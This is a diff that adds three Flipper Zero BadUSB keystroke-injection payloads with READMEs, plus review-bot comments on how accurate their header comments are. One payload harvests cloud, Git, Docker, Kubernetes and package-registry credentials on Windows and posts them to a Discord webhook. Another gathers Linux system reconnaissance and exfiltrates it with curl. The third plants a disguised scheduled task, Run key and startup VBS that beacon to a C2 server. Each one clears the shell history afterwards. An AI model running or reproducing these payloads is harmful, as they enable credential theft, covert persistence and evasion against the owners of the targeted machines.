diff --git a/badusb/NullSec-CloudHarvester/README.md b/badusb/NullSec-CloudHarvester/README.md
new file mode 100644
index 0000000..3de0eeb
--- /dev/null
+++ b/badusb/NullSec-CloudHarvester/README.md
@@ -0,0 +1,53 @@
+# NullSec-CloudHarvester
+
+**Cloud Service Credential & Configuration Extractor**
+
+## Description
+
+Extracts saved cloud CLI credentials, API tokens, and configuration files from a Windows target. Targets developers and DevOps engineers who use cloud CLIs.
+
+## Targeted Services
+
+| Service | Files Extracted |
+|---------|----------------|
+| **AWS CLI** | `~/.aws/credentials`, `~/.aws/config` |
+| **Azure CLI** | `~/.azure/azureProfile.json`, `clouds.config` |
+| **Google Cloud** | `application_default_credentials.json`, `properties`, `credentials.db` path |
+| **Docker** | `~/.docker/config.json` (registry auth tokens) |
+| **Kubernetes** | `~/.kube/config` (cluster creds + certs) |
+| **SSH** | Key file inventory from `~/.ssh/` |
+| **Git** | `~/.git-credentials`, `~/.gitconfig` |
+| **Terraform** | `~/.terraformrc`, `credentials.tfrc.json` |
+| **npm** | `~/.npmrc` (registry tokens) |
+| **pip** | `pip.ini` (index credentials) |
+
+## Setup
+
+1. Edit `payload.txt` and replace `YOUR_DISCORD_WEBHOOK_URL` with your Discord webhook
+2. Copy to Flipper Zero SD: `SD/badusb/NullSec-CloudHarvester/`
+3. Run via BadUSB app
+
+## Exfiltration
+
+Data is sent to a Discord webhook in chunked messages (1900 char limit per message). Each cloud service section is clearly labeled.
+
+## Target
+
+- **OS:** Windows 10/11
+- **Requirements:** PowerShell (default on Windows)
+- **Best against:** Developer workstations, CI/CD machines, DevOps laptops
+
+## OPSEC Notes
+
+- Runs in hidden PowerShell window
+- Clears PSReadLine history on exit
+- No files written to disk
+- No persistent modifications
+
+## Legal
+
+**For authorized penetration testing and security assessments only.**
+
+## Author
+
+NullSec ([@bad-antics](https://github.com/bad-antics))
diff --git a/badusb/NullSec-CloudHarvester/payload.txt b/badusb/NullSec-CloudHarvester/payload.txt
new file mode 100644
index 0000000..171ad03
--- /dev/null
+++ b/badusb/NullSec-CloudHarvester/payload.txt
@@ -0,0 +1,121 @@ +REM ################################################ +REM # NullSec-CloudHarvester # +REM # Cloud Service Credential & Config Extractor # +REM # Target: Windows 10/11 # +REM # Author: NullSec (github.com/bad-antics) # +REM ################################################ +REM +REM Extracts saved cloud CLI credentials and configs: +REM - AWS CLI credentials & config +REM - Azure CLI tokens & profiles +REM - Google Cloud SDK configs +REM - Docker configs & registries +REM - Kubernetes configs +REM - Terraform state references +REM - SSH keys inventory +REM - Git credentials +REM +REM Exfiltration: Discord Webhook (configure below) +REM For authorized penetration testing only. + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -w hidden -ep bypass +ENTER +DELAY 1500 + +REM === CONFIGURE YOUR WEBHOOK HERE === +STRING $wh='YOUR_DISCORD_WEBHOOK_URL'; +ENTER + +STRING $r=@();$u=$env:USERPROFILE;$h=$env:COMPUTERNAME; +ENTER + +REM --- AWS Credentials --- +STRING $awsCred="$u\.aws\credentials";$awsConf="$u\.aws\config"; +ENTER +STRING if(Test-Path $awsCred){$r+="=== AWS CREDENTIALS ===`n"+(gc $awsCred -Raw)} +ENTER +STRING if(Test-Path $awsConf){$r+="=== AWS CONFIG ===`n"+(gc $awsConf -Raw)} +ENTER + +REM --- Azure CLI --- +STRING $azDir="$u\.azure"; +ENTER +STRING if(Test-Path "$azDir\azureProfile.json"){$r+="=== AZURE PROFILE ===`n"+(gc "$azDir\azureProfile.json" -Raw)} +ENTER +STRING if(Test-Path "$azDir\clouds.config"){$r+="=== AZURE CLOUDS ===`n"+(gc "$azDir\clouds.config" -Raw)} +ENTER + +REM --- Google Cloud --- +STRING $gDir="$env:APPDATA\gcloud"; +ENTER +STRING if(Test-Path "$gDir\credentials.db"){$r+="=== GCLOUD CREDS DB EXISTS ===`nPath: $gDir\credentials.db"} +ENTER +STRING if(Test-Path "$gDir\properties"){$r+="=== GCLOUD PROPERTIES ===`n"+(gc "$gDir\properties" -Raw)} +ENTER +STRING if(Test-Path "$gDir\application_default_credentials.json"){$r+="=== GCLOUD ADC ===`n"+(gc "$gDir\application_default_credentials.json" -Raw)} +ENTER + +REM --- 
Docker --- +STRING $dk="$u\.docker\config.json"; +ENTER +STRING if(Test-Path $dk){$r+="=== DOCKER CONFIG ===`n"+(gc $dk -Raw)} +ENTER + +REM --- Kubernetes --- +STRING $kc="$u\.kube\config"; +ENTER +STRING if(Test-Path $kc){$r+="=== KUBECONFIG ===`n"+(gc $kc -Raw)} +ENTER + +REM --- SSH Keys Inventory --- +STRING $sshDir="$u\.ssh"; +ENTER +STRING if(Test-Path $sshDir){$keys=gci $sshDir -File|%{$_.Name};$r+="=== SSH KEYS ===`n"+($keys-join"`n")} +ENTER + +REM --- Git Credentials --- +STRING $gitCred="$u\.git-credentials"; +ENTER +STRING if(Test-Path $gitCred){$r+="=== GIT CREDENTIALS ===`n"+(gc $gitCred -Raw)} +ENTER +STRING $gitConf="$u\.gitconfig"; +ENTER +STRING if(Test-Path $gitConf){$r+="=== GITCONFIG ===`n"+(gc $gitConf -Raw)} +ENTER + +REM --- Terraform --- +STRING $tfrc="$u\.terraformrc";$tfCred="$env:APPDATA\terraform.d\credentials.tfrc.json"; +ENTER +STRING if(Test-Path $tfrc){$r+="=== TERRAFORMRC ===`n"+(gc $tfrc -Raw)} +ENTER +STRING if(Test-Path $tfCred){$r+="=== TERRAFORM CREDS ===`n"+(gc $tfCred -Raw)} +ENTER + +REM --- npm/pip tokens --- +STRING $npmrc="$u\.npmrc"; +ENTER +STRING if(Test-Path $npmrc){$r+="=== NPMRC ===`n"+(gc $npmrc -Raw)} +ENTER +STRING $pipConf="$env:APPDATA\pip\pip.ini"; +ENTER +STRING if(Test-Path $pipConf){$r+="=== PIP CONFIG ===`n"+(gc $pipConf -Raw)} +ENTER + +REM --- Exfiltrate --- +STRING $out="Cloud Harvest [$h] User: $env:USERNAME`n"+($r-join"`n---`n"); +ENTER +STRING $chunks=[math]::Ceiling($out.Length/1900); +ENTER +STRING for($i=0;$i -lt $chunks;$i++){$chunk=$out.Substring($i*1900,[math]::Min(1900,$out.Length-$i*1900)); +ENTER +STRING $body=@{content="``````$chunk``````"}|ConvertTo-Json; +ENTER +STRING irm $wh -Method Post -Body $body -ContentType 'application/json' -ea SilentlyContinue} +ENTER + +REM --- Cleanup --- +STRING Remove-Item (Get-PSReadLineOption).HistorySavePath -ea SilentlyContinue;exit +ENTER 
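Review bot: The collection list in the header comment (the `REM -` lines at the top of the hunk) does not match the sections that follow: it names `Terraform state references`, but the Terraform section only reads `$u\.terraformrc` and `$env:APPDATA\terraform.d\credentials.tfrc.json`, which are CLI credential files, and it omits the npm/pip section that reads `.npmrc` and `pip.ini` altogether. An assessor reconciles the collected material against this list and the README table, so the header should describe exactly what the script reads. Change that line to `REM - Terraform CLI credentials (.terraformrc, credentials.tfrc.json)` and add `REM - npm/pip registry config (.npmrc, pip.ini)` beneath it.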
diff --git a/badusb/NullSec-LinuxRecon/README.md b/badusb/NullSec-LinuxRecon/README.md
new file mode 100644
index 0000000..b3035b8
--- /dev/null
+++ b/badusb/NullSec-LinuxRecon/README.md
@@ -0,0 +1,49 @@
+# NullSec-LinuxRecon
+
+**Comprehensive Linux System Reconnaissance via BadUSB**
+
+## Description
+
+Performs thorough system reconnaissance on Linux targets (Ubuntu, Debian, Fedora, Arch, etc.) and exfiltrates findings via webhook.
+
+## Information Gathered
+
+| Category | Details |
+|----------|---------|
+| **System** | Hostname, kernel, distro, uptime, CPU, RAM, disk |
+| **User** | Current user, UID, groups, sudo privileges, shell, SSH keys |
+| **Users** | All accounts with shell access |
+| **Network** | Interfaces, IPs, gateway, DNS, ARP table |
+| **Ports** | All listening TCP/UDP ports with process names |
+| **Services** | Running systemd services |
+| **Cron** | User and system cron jobs |
+| **Security** | iptables/ufw rules, SELinux, AppArmor status |
+| **SUID** | SUID binaries (privilege escalation candidates) |
+| **Containers** | Docker/Podman running containers |
+| **Files** | Cloud creds existence check (AWS, Kube, Docker) |
+
+## Setup
+
+1. Edit `payload.txt` and replace `YOUR_WEBHOOK_URL` with your Discord/Slack webhook
+2. Copy to Flipper Zero SD: `SD/badusb/NullSec-LinuxRecon/`
+
+## Terminal Launch
+
+Uses `Ctrl+Alt+T` which works on most Linux desktop environments:
+- GNOME, KDE, XFCE, MATE, Cinnamon, Unity
+
+## OPSEC
+
+- Runs entirely in background subshell
+- Clears bash history after execution
+- Unsets variables
+- No files written to disk
+- Terminal window closes automatically
+
+## Legal
+
+**For authorized penetration testing and security assessments only.**
+
+## Author
+
+NullSec ([@bad-antics](https://github.com/bad-antics))
diff --git a/badusb/NullSec-LinuxRecon/payload.txt b/badusb/NullSec-LinuxRecon/payload.txt
new file mode 100644
index 0000000..64f5e49
--- /dev/null
+++ b/badusb/NullSec-LinuxRecon/payload.txt
@@ -0,0 +1,166 @@ +REM ################################################ +REM # NullSec-LinuxRecon # +REM # Linux System Reconnaissance via BadUSB # +REM # Target: Linux (Ubuntu/Debian/Fedora/Arch) # +REM # Author: NullSec (github.com/bad-antics) # +REM ################################################ +REM +REM Comprehensive Linux system reconnaissance: +REM - System info (kernel, distro, arch, uptime) +REM - Network config (interfaces, routes, DNS, ARP) +REM - User enumeration (users, groups, sudo, SSH keys) +REM - Running services and open ports +REM - Cron jobs and scheduled tasks +REM - Installed packages (security-relevant) +REM - Docker/container detection +REM - SUID/SGID binary enumeration +REM - Firewall rules +REM +REM Exfiltration: Webhook (configure below) +REM For authorized penetration testing only. + +DELAY 1000 + +REM Open terminal - try multiple methods +CTRL ALT t +DELAY 1500 + +REM === CONFIGURE YOUR WEBHOOK HERE === +STRING export WH='YOUR_WEBHOOK_URL' +ENTER +DELAY 200 + +STRING bash -c '( +ENTER +STRING R="" +ENTER + +REM --- System Info --- +STRING R+="=== SYSTEM INFO ===\n" +ENTER +STRING R+="Hostname: $(hostname)\n" +ENTER +STRING R+="Kernel: $(uname -a)\n" +ENTER +STRING R+="Distro: $(cat /etc/os-release 2>/dev/null | grep PRETTY | cut -d= -f2)\n" +ENTER +STRING R+="Uptime: $(uptime -p 2>/dev/null || uptime)\n" +ENTER +STRING R+="Arch: $(arch)\n" +ENTER +STRING R+="CPU: $(grep -m1 "model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2)\n" +ENTER +STRING R+="RAM: $(free -h 2>/dev/null | awk "/Mem:/{print \$2}")\n" +ENTER +STRING R+="Disk: $(df -h / 2>/dev/null | awk "NR==2{print \$2,\$5}")\n\n" +ENTER + +REM --- Current User --- +STRING R+="=== USER INFO ===\n" +ENTER +STRING R+="User: $(whoami)\n" +ENTER +STRING R+="UID: $(id)\n" +ENTER +STRING R+="Groups: $(groups)\n" +ENTER +STRING R+="Sudo: $(sudo -n -l 2>/dev/null | head -5 || echo "requires password")\n" +ENTER +STRING R+="Home: $(ls -la ~ 2>/dev/null | head -5)\n" +ENTER +STRING 
R+="Shell: $SHELL\n" +ENTER +STRING R+="SSH Keys: $(ls ~/.ssh/ 2>/dev/null | tr "\n" " " || echo "none")\n\n" +ENTER + +REM --- Other Users --- +STRING R+="=== ALL USERS (shell access) ===\n" +ENTER +STRING R+="$(grep -v nologin /etc/passwd 2>/dev/null | grep -v false | cut -d: -f1,3,6)\n\n" +ENTER + +REM --- Network --- +STRING R+="=== NETWORK ===\n" +ENTER +STRING R+="$(ip -4 addr show 2>/dev/null | grep -E "inet |^[0-9]" || ifconfig 2>/dev/null | grep -E "inet |^[a-z]")\n" +ENTER +STRING R+="Gateway: $(ip route show default 2>/dev/null | awk "{print \$3}")\n" +ENTER +STRING R+="DNS: $(cat /etc/resolv.conf 2>/dev/null | grep nameserver | awk "{print \$2}" | tr "\n" " ")\n" +ENTER +STRING R+="ARP: $(arp -n 2>/dev/null | grep -v Address | head -10)\n\n" +ENTER + +REM --- Listening Ports --- +STRING R+="=== LISTENING PORTS ===\n" +ENTER +STRING R+="$(ss -tulnp 2>/dev/null | head -20 || netstat -tulnp 2>/dev/null | head -20)\n\n" +ENTER + +REM --- Services --- +STRING R+="=== RUNNING SERVICES ===\n" +ENTER +STRING R+="$(systemctl list-units --type=service --state=running 2>/dev/null | head -20 || service --status-all 2>/dev/null | grep + | head -20)\n\n" +ENTER + +REM --- Cron --- +STRING R+="=== CRON JOBS ===\n" +ENTER +STRING R+="$(crontab -l 2>/dev/null || echo "no user crontab")\n" +ENTER +STRING R+="System cron: $(ls /etc/cron.d/ 2>/dev/null | tr "\n" " ")\n\n" +ENTER + +REM --- Security --- +STRING R+="=== SECURITY ===\n" +ENTER +STRING R+="Firewall (iptables): $(iptables -L -n 2>/dev/null | head -10 || echo "no access")\n" +ENTER +STRING R+="Firewall (ufw): $(ufw status 2>/dev/null || echo "not installed")\n" +ENTER +STRING R+="SELinux: $(getenforce 2>/dev/null || echo "not installed")\n" +ENTER +STRING R+="AppArmor: $(aa-status 2>/dev/null | head -3 || echo "not installed")\n\n" +ENTER + +REM --- SUID Binaries --- +STRING R+="=== SUID BINARIES ===\n" +ENTER +STRING R+="$(find /usr/bin /usr/sbin /bin /sbin -perm -4000 2>/dev/null | head -15)\n\n" +ENTER + +REM 
--- Docker --- +STRING R+="=== CONTAINERS ===\n" +ENTER +STRING R+="Docker: $(docker ps 2>/dev/null | head -10 || echo "not available")\n" +ENTER +STRING R+="Podman: $(podman ps 2>/dev/null | head -5 || echo "not available")\n\n" +ENTER + +REM --- Interesting Files --- +STRING R+="=== INTERESTING FILES ===\n" +ENTER +STRING R+="Bash history: $(wc -l < ~/.bash_history 2>/dev/null || echo 0) lines\n" +ENTER +STRING R+="AWS: $(test -f ~/.aws/credentials && echo "FOUND" || echo "none")\n" +ENTER +STRING R+="Kube: $(test -f ~/.kube/config && echo "FOUND" || echo "none")\n" +ENTER +STRING R+="Docker: $(test -f ~/.docker/config.json && echo "FOUND" || echo "none")\n" +ENTER + +REM --- Exfiltrate --- +STRING printf "%s" "$R" | fold -w 1900 | while IFS= read -r chunk; do +ENTER +STRING curl -s -X POST "$WH" -H "Content-Type: application/json" -d "{\"content\":\"\`\`\`$chunk\`\`\`\"}" 2>/dev/null +ENTER +STRING sleep 1; done +ENTER + +REM --- Cleanup --- +STRING history -c; unset WH R +ENTER +STRING ) &>/dev/null &' +ENTER +STRING exit +ENTER diff --git a/badusb/NullSec-PersistPlant/README.md b/badusb/NullSec-PersistPlant/README.md new file mode 100644 index 0000000..381b4a2 --- /dev/null +++ b/badusb/NullSec-PersistPlant/README.md 
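Review bot: The header comment overstates what this hunk collects: it lists `Installed packages (security-relevant)`, but no package query appears anywhere in the script, and it says `SUID/SGID binary enumeration` while the `find` in the SUID section uses only `-perm -4000`, so SGID binaries are never looked at. The `REM Open terminal - try multiple methods` comment is likewise followed by a single `CTRL ALT t` keystroke. Drop the packages line, change the SUID line to `REM - SUID binary enumeration (/usr/bin, /usr/sbin, /bin, /sbin)`, and change the terminal comment to `REM Open terminal (Ctrl+Alt+T)` so the header matches the README's Information Gathered table and what the script actually runs.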
@@ -0,0 +1,73 @@
+# NullSec-PersistPlant
+
+**Covert Persistence Mechanism Installer via BadUSB**
+
+## Description
+
+Installs multiple persistence mechanisms on a Windows target that beacon home to your C2/listener. Uses three independent methods for redundancy — if one is removed, the others continue operating.
+
+## Persistence Methods
+
+| Method | Mechanism | Admin Required | Survives |
+|--------|-----------|---------------|----------|
+| **Scheduled Task** | `WindowsHealthCheck` task at logon + every 4 hours | No (HKCU) | Reboot, user logoff |
+| **Registry Run Key** | `HKCU\...\Run\WindowsHealthSvc` | No | Reboot |
+| **Startup VBS** | `HealthCheck.vbs` in Startup folder | No | Reboot |
+
+## Beacon Payload
+
+Each persistence method executes a PowerShell beacon that sends:
+```json
+{
+ "user": "targetuser",
+ "host": "WORKSTATION-01",
+ "ip": "192.168.1.50",
+ "os": "Windows 11 Pro",
+ "time": "2024-01-15 14:30:00"
+}
+```
+
+## Setup
+
+1. Set up a listener (simple webhook, Discord, or C2 framework)
+2. Edit `payload.txt` and replace `YOUR_LISTENER_URL` with your endpoint
+3. Copy to Flipper Zero SD: `SD/badusb/NullSec-PersistPlant/`
+
+## Cleanup / Removal
+
+To remove all persistence from a target:
+```powershell
+# Remove scheduled task
+Unregister-ScheduledTask -TaskName 'WindowsHealthCheck' -Confirm:$false
+
+# Remove registry key
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsHealthSvc'
+
+# Remove startup VBS
+Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\HealthCheck.vbs"
+```
+
+## OPSEC Notes
+
+- All three methods use HKCU (no admin/UAC required)
+- Task and registry names mimic Windows health services
+- VBS wrapper hides the PowerShell window
+- PowerShell history is cleared after execution
+- Beacon uses encoded command to avoid command-line logging
+- Reports back which methods were successfully installed
+
+## Detection
+
+Defenders can look for:
+- Scheduled tasks with encoded PowerShell arguments
+- `HKCU\Run` entries with `powershell -enc` commands
+- `.vbs` files in Startup folder
+- Network connections to unknown endpoints at regular intervals
+
+## Legal
+
+**For authorized penetration testing and red team engagements only. Always obtain written permission before deploying persistence mechanisms.**
+
+## Author
+
+NullSec ([@bad-antics](https://github.com/bad-antics))
diff --git a/badusb/NullSec-PersistPlant/payload.txt b/badusb/NullSec-PersistPlant/payload.txt
new file mode 100644
index 0000000..a4b8581
--- /dev/null
+++ b/badusb/NullSec-PersistPlant/payload.txt
@@ -0,0 +1,101 @@ +REM ################################################ +REM # NullSec-PersistPlant # +REM # Covert Persistence Mechanism Installer # +REM # Target: Windows 10/11 # +REM # Author: NullSec (github.com/bad-antics) # +REM ################################################ +REM +REM Installs multiple persistence mechanisms: +REM - Scheduled Task (runs at logon) +REM - Registry Run key +REM - Startup folder shortcut +REM +REM The "implant" is a configurable PowerShell beacon +REM that phones home to your listener on each trigger. +REM +REM For authorized penetration testing only. + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -w hidden -ep bypass +ENTER +DELAY 1500 + +REM === CONFIGURE YOUR C2/LISTENER HERE === +STRING $C2='YOUR_LISTENER_URL'; +ENTER + +REM === Build the beacon payload === +STRING $beacon = @' +ENTER +STRING $u = $env:USERNAME; $h = $env:COMPUTERNAME +ENTER +STRING $ip = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object {$_.IPAddress -notlike '127.*'} | Select -First 1).IPAddress +ENTER +STRING $os = (Get-CimInstance Win32_OperatingSystem).Caption +ENTER +STRING $body = @{user=$u;host=$h;ip=$ip;os=$os;time=(Get-Date -f 'yyyy-MM-dd HH:mm:ss')} | ConvertTo-Json +ENTER +STRING try { Invoke-RestMethod -Uri $C2 -Method Post -Body $body -ContentType 'application/json' -TimeoutSec 10 } catch {} +ENTER +STRING '@; +ENTER + +REM --- Encode the beacon for persistence --- +STRING $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($beacon)); +ENTER +STRING $cmd = "powershell -w hidden -ep bypass -enc $encoded"; +ENTER + +REM === Method 1: Scheduled Task === +STRING $taskName = 'WindowsHealthCheck'; +ENTER +STRING $action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument "-w hidden -ep bypass -enc $encoded"; +ENTER +STRING $trigger1 = New-ScheduledTaskTrigger -AtLogon; +ENTER +STRING $trigger2 = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 4); +ENTER +STRING $settings = 
New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries; +ENTER +STRING Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger1,$trigger2 -Settings $settings -Description 'Windows Health Monitoring Service' -Force 2>$null; +ENTER + +REM === Method 2: Registry Run Key (HKCU - no admin needed) === +STRING $regPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'; +ENTER +STRING Set-ItemProperty -Path $regPath -Name 'WindowsHealthSvc' -Value $cmd -Force 2>$null; +ENTER + +REM === Method 3: Startup Folder === +STRING $startupPath = [Environment]::GetFolderPath('Startup'); +ENTER +STRING $vbsContent = 'Set WshShell = CreateObject("WScript.Shell")' + "`r`n" + 'WshShell.Run "' + $cmd + '", 0, False'; +ENTER +STRING $vbsContent | Out-File "$startupPath\HealthCheck.vbs" -Encoding ASCII -Force 2>$null; +ENTER + +REM --- Confirm installation --- +STRING $methods = @(); +ENTER +STRING if(Get-ScheduledTask -TaskName $taskName -ea SilentlyContinue){$methods += 'ScheduledTask'} +ENTER +STRING if((Get-ItemProperty $regPath -ea SilentlyContinue).WindowsHealthSvc){$methods += 'Registry'} +ENTER +STRING if(Test-Path "$startupPath\HealthCheck.vbs"){$methods += 'StartupVBS'} +ENTER + +REM --- Report back --- +STRING $report = @{host=$env:COMPUTERNAME;user=$env:USERNAME;methods=($methods -join ',');status='planted'} | ConvertTo-Json; +ENTER +STRING irm $C2 -Method Post -Body $report -ContentType 'application/json' -ea SilentlyContinue; +ENTER + +REM --- Cleanup evidence --- +STRING Remove-Item (Get-PSReadLineOption).HistorySavePath -ea SilentlyContinue; +ENTER +STRING [Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory(); +ENTER +STRING exit +ENTER
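Review bot: The header comment says `Startup folder shortcut`, but Method 3 writes a `HealthCheck.vbs` file with `Out-File` into `[Environment]::GetFolderPath('Startup')`, not a `.lnk` shortcut, and the header nowhere names the three host artifacts this script deliberately leaves behind (task `WindowsHealthCheck`, the `WindowsHealthSvc` value under the HKCU Run key, and `HealthCheck.vbs`), which the `REM --- Cleanup evidence ---` section does not touch. Whoever runs the engagement has to verify those are removed afterwards, and the removal steps live only in the README. Change the header line to `REM - Startup folder VBS launcher (HealthCheck.vbs)` and add a line such as `REM Host artifacts created: task WindowsHealthCheck, HKCU Run value WindowsHealthSvc, Startup\HealthCheck.vbs (removal steps in README)` so the payload documents its own footprint.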